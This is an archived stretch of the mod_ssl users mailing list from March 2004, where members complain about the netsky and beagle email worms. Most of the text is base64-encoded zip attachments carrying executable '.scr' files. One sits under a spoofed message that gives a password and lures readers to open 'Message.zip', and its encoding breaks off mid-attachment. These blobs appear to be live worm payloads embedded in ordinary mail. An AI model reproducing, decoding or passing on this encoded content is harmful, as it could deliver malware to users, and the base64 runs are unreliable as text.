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

----------ygshaitprdddkypsnnfv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 16:35:40 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E9F23A8A7F; Tue,  2 Mar 2004 16:35:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from indigo.quadrant.net (indigo.quadrant.net [207.195.92.9])
	by master.modssl.org (Postfix) with ESMTP id 33C3BA8973
	for ; Tue,  2 Mar 2004 16:35:26 +0100 (CET)
Received: from [192.168.100.122] (production.marketingden.com [204.83.38.3])
	by indigo.quadrant.net (8.12.10/8.12.10) with ESMTP id i22FZNvc016366
	for ; Tue, 2 Mar 2004 09:35:23 -0600 (CST)
User-Agent: Microsoft-Entourage/9.0.2.4011
Date: Tue, 02 Mar 2004 09:35:09 -0600
Subject: Re: netsky, beagle, et al.
From: James Hastings-Trew 
To: 
Message-ID: 
In-Reply-To: 
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Hastings-Trew 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

If we can't filter these viruses out of the mailing list I may have no
choice but to add rse@engelschall.com to my spam filter, which I don't want
to do.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 16:39:11 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 74CFDA8A89; Tue,  2 Mar 2004 16:39:11 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.onstart.net (mail.onstart.net [65.205.122.5])
	by master.modssl.org (Postfix) with ESMTP id 85559A8A85
	for ; Tue,  2 Mar 2004 16:38:58 +0100 (CET)
Received: from OnStart01 (cable-68-114-117-30.sli.la.charter.com [68.114.117.30])
	by mail.onstart.net (Postfix) with ESMTP id 18D8AB7AE5
	for ; Tue,  2 Mar 2004 09:31:10 -0600 (CST)
From: "Scott Scoggin" 
To: 
Subject: RE: ^_^ meay-meay!
Date: Tue, 2 Mar 2004 09:39:01 -0600
Message-ID: <001301c4006c$7c99f8f0$c97ba8c0@OnStart01>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.4510
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Scott Scoggin" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of rse@engelschall.com
Sent: Tuesday, March 02, 2004 9:29 AM
To: modssl-users@modssl.org
Subject: ^_^ meay-meay!

I enjoy clean conversations but am open to conversing with women and men
with little ones as well. I am very open-minded. All authorization requests
will be denied if I don't receive messages and get to know you first.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 18:03:40 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 73EF3A8A81; Tue,  2 Mar 2004 18:03:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from TONYOFFICE (host-64-179-56-22.gra.choiceone.net [64.179.56.22])
	by master.modssl.org (Postfix) with SMTP id A4B5CA8973
	for ; Tue,  2 Mar 2004 18:03:27 +0100 (CET)
Date: Tue, 02 Mar 2004 12:03:25 -0500
To: modssl-users@modssl.org
Subject: ^_^ meay-meay!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------cqpbvwhgjukdcknyaoqx"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------cqpbvwhgjukdcknyaoqx
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Argh, i don't like the  plaintext  :)

password: 50608

----------cqpbvwhgjukdcknyaoqx
Content-Type: application/octet-stream; name="Message.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Message.zip"

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
